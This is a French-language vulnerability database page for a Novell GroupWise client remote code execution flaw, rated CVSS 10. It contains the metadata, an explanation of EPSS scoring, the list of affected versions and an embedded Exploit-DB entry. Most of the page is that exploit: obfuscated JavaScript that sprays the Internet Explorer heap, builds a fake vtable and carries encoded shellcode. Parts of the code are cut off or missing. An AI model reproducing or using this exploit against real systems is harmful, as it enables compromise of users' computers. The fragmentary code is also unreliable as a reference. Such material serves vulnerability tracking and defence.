Faiblesses connexes
Nom de la faiblesse |
Source |
CWE-78 |
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
10 |
AV:N/AC:L/Au:N/C:C/I:C/A:C |
[email protected] |
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 38250
Date de publication : 2013-01-30 23h00 +00:00
Auteur : High-Tech Bridge
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/57657/info
Novell Groupwise Client is prone to multiple remote code-execution vulnerabilities.
A remote attacker can leverage this issue to execute arbitrary code within the context of the application. Successful exploits will compromise the application, and possibly, the underlying computer.
The following versions are vulnerable:
Versions prior to 8.0.3 Hot Patch 2
Versions prior to GroupWise 2012 SP1 Hot Patch 1
<!-- (c)oded by High-Tech Bridge Security Research Lab -->
<!-- Windows XP-SP3 Internet Explorer 8.0 - Dep Disabled -->
<Title>- Novell GroupWise 12.0 InvokeContact method Exploit - </Title>
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function GyGguPonxZoADbtgXPS() {
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl = function(maxAlloc, heapBase) {
this.maxAlloc = (maxAlloc ? maxAlloc : 65535);
this.heapBase = (heapBase ? heapBase : 0x150000);
this.KJZFzfumaV = "AAAA";
while (4 + this.KJZFzfumaV.length*2 + 2 < this.maxAlloc) {
this.KJZFzfumaV += this.KJZFzfumaV;
this.mem = new Array();
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.mNhbOXqosTNKjGhfj = function(msg) {
void(Math.atan2(0xbabe, msg));
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.YMQLSZf = function(enable) {
if (enable == true)
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.ooWKILTrZUXKEMl = function(msg) {
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.zoNWUcOOYegFinTDSbOSAAM = function(len) {
if (len > this.KJZFzfumaV.length)
throw "Requested zoNWUcOOYegFinTDSbOSAAM string length " + len + ", only " + this.KJZFzfumaV.length + " available";
return this.KJZFzfumaV.substr(0, len);
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.UWzqrDQwReXOllGssMYEzruQtomLp = function(num, UWzqrDQwReXOllGssMYEzruQtomLp) {
if (UWzqrDQwReXOllGssMYEzruQtomLp == 0)
throw "Round argument cannot be 0";
return parseInt((num + (UWzqrDQwReXOllGssMYEzruQtomLp-1)) / UWzqrDQwReXOllGssMYEzruQtomLp) * UWzqrDQwReXOllGssMYEzruQtomLp;
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.beTBwoiJGBBhwyZg = function(num, width)
var digits = "0123456789ABCDEF";
var beTBwoiJGBBhwyZg = digits.substr(num & 0xF, 1);
while (num > 0xF) {
num = num >>> 4;
beTBwoiJGBBhwyZg = digits.substr(num & 0xF, 1) + beTBwoiJGBBhwyZg;
var width = (width ? width : 0);
while (beTBwoiJGBBhwyZg.length < width)
beTBwoiJGBBhwyZg = "0" + beTBwoiJGBBhwyZg;
return beTBwoiJGBBhwyZg;
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.RBRfbU = function(RBRfbU) {
return unescape("%u" + this.beTBwoiJGBBhwyZg(RBRfbU & 0xFFFF, 4) + "%u" + this.beTBwoiJGBBhwyZg((RBRfbU >> 16) & 0xFFFF, 4));
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.nPdkLCpaz = function(arg, tag) {
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (this.mem[tag] === undefined)
this.mem[tag] = new Array();
if (typeof arg == "string" || arg instanceof String) {
this.mem[tag].push(arg.substr(0, arg.length));
else {
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.SWc = function(tag) {
delete this.mem[tag];
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.AocZkxOTvEXwFTsIPMSanrManzYrte = function() {
this.mNhbOXqosTNKjGhfj("Flushing the OLEAUT32 cache");
for (var i = 0; i < 6; i++) {
this.nPdkLCpaz(32, "oleaut32");
this.nPdkLCpaz(64, "oleaut32");
this.nPdkLCpaz(256, "oleaut32");
this.nPdkLCpaz(32768, "oleaut32");
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.uYiBaSLpjlOJJdhFAb = function(arg, tag) {
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
size = arg;
if (size == 32 || size == 64 || size == 256 || size == 32768)
throw "Allocation sizes " + size + " cannot be flushed out of the OLEAUT32 cache";
this.nPdkLCpaz(arg, tag);
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.K = function(tag) {
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.WbTbmzXVnhA = function() {
this.mNhbOXqosTNKjGhfj("Running the garbage collector");
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.ZsJjplNR = function(arg, count) {
var count = (count ? count : 1);
for (var i = 0; i < count; i++) {
this.uYiBaSLpjlOJJdhFAb(arg, "ZsJjplNR");
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.WbjLbPsZ = function(arg, count) {
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (size+8 >= 1024)
throw("Maximum WbjLbPsZ block size is 1008 bytes");
var count = (count ? count : 1);
for (var i = 0; i < count; i++)
this.uYiBaSLpjlOJJdhFAb(arg, "WbjLbPsZ");
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.foURAtIhCeelDtsbOQrWNdbMLDvFP = function(arg)
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (size+8 >= 1024)
throw("Maximum WbjLbPsZ block size is 1008 bytes");
return this.heapBase + 0x688 + ((size+8)/8)*48;
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.udIUhjCc = function(shellcode, jmpecx, size) {
var size = (size ? size : 1008);
if ((size & 0xf) != 0)
throw "Vtable size " + size + " must be a multiple of 16";
if (shellcode.length*2 > size-138)
throw("Maximum shellcode length is " + (size-138) + " bytes");
var udIUhjCc = unescape("%u9090%u7ceb")
for (var i = 0; i < 124/4; i++)
udIUhjCc += this.RBRfbU(jmpecx);
udIUhjCc += unescape("%u0028%u0028") +
shellcode + heap.zoNWUcOOYegFinTDSbOSAAM((size-138)/2 - shellcode.length);
return udIUhjCc;
var heap_obj = new GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl(0x10000);
var payload2 = unescape(
"%u4242%u4242%u4242%u4242%ucccc%ucccc%ucccc%ucccc%ucccc%u0c40%u0c0c%u0c44%u0c0c%u0c48%u0c0c%ue8fc%u0089%u0000%u8960%u31e5" +
"%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b" +
"%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf" +
"%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b" +
"%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd" +
"%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063" +
var payload = unescape("%u0c0c%u0c0c%u0003%u0000%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
var zoNWUcOOYegFinTDSbOSAAM = unescape("%u9090%u9090");
while (zoNWUcOOYegFinTDSbOSAAM.length < 0x1000) zoNWUcOOYegFinTDSbOSAAM += zoNWUcOOYegFinTDSbOSAAM;
offset_length = 0x5F6;
junk_offset = zoNWUcOOYegFinTDSbOSAAM.substring(0, offset_length);
var shellcode = junk_offset + payload + payload2 + zoNWUcOOYegFinTDSbOSAAM.substring(0, 0x800 - payload2.length - junk_offset.length - payload.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(2, 0x40000 - 0x21);
for (var i=0; i < 250; i++) {
Products Mentioned
Configuraton 0
Novell>>Groupwise >> Version 8.0
Novell>>Groupwise >> Version 8.00
Novell>>Groupwise >> Version 8.00
Novell>>Groupwise >> Version 8.00
Novell>>Groupwise >> Version 8.01
Novell>>Groupwise >> Version 8.01
Novell>>Groupwise >> Version 8.02
Novell>>Groupwise >> Version 8.02
Novell>>Groupwise >> Version 8.02
Novell>>Groupwise >> Version 8.02
Novell>>Groupwise >> Version 8.03
Novell>>Groupwise >> Version 8.03
Configuraton 0
Novell>>Groupwise >> Version 2012
Novell>>Groupwise >> Version 2012